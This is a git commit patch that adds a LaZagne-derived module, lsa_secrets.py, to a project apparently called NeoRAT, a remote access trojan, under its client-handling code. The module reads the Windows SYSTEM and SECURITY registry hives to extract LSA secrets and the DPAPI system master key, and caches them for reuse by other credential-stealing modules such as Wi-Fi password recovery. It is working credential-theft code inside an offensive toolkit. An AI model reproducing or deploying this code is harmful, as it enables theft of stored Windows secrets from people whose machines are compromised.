From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL <alvin@alvinhavel.com>
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT

---
 .../lazagne/softwares/windows/lsa_secrets.py       | 34 ++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/windows/lsa_secrets.py

(limited to 'foreign/client_handling/lazagne/softwares/windows/lsa_secrets.py')

diff --git a/foreign/client_handling/lazagne/softwares/windows/lsa_secrets.py b/foreign/client_handling/lazagne/softwares/windows/lsa_secrets.py
new file mode 100644
index 0000000..42645d6
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/windows/lsa_secrets.py
@@ -0,0 +1,34 @@
+# -*- coding: utf-8 -*- 
+import struct
+
+from .creddump7.win32.lsasecrets import get_file_secrets
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import get_os_version
+from foreign.client_handling.lazagne.config.constant import constant
+
+
+class LSASecrets(ModuleInfo):
+    def __init__(self):
+        ModuleInfo.__init__(self, 'lsa_secrets', 'windows', system_module=True)
+
+    def run(self):
+
+        # DPAPI structure could compute lsa secrets as well, so do not do it again
+        if constant.lsa_secrets:
+            return ['__LSASecrets__', constant.lsa_secrets]
+
+        is_vista_or_higher = False
+        if float(get_os_version()) >= 6.0:
+            is_vista_or_higher = True
+
+        # Get LSA Secrets
+        secrets = get_file_secrets(constant.hives['system'], constant.hives['security'], is_vista_or_higher)
+        if secrets:
+            # Clear DPAPI master key 
+            clear = secrets[b'DPAPI_SYSTEM']
+            size = struct.unpack_from("<L", clear)[0]
+            secrets[b'DPAPI_SYSTEM'] = clear[16:16 + 44]
+
+            # Keep value to be reused in other module (e.g wifi)
+            constant.lsa_secrets = secrets
+            return ['__LSASecrets__', secrets]
-- 
cgit v1.2.3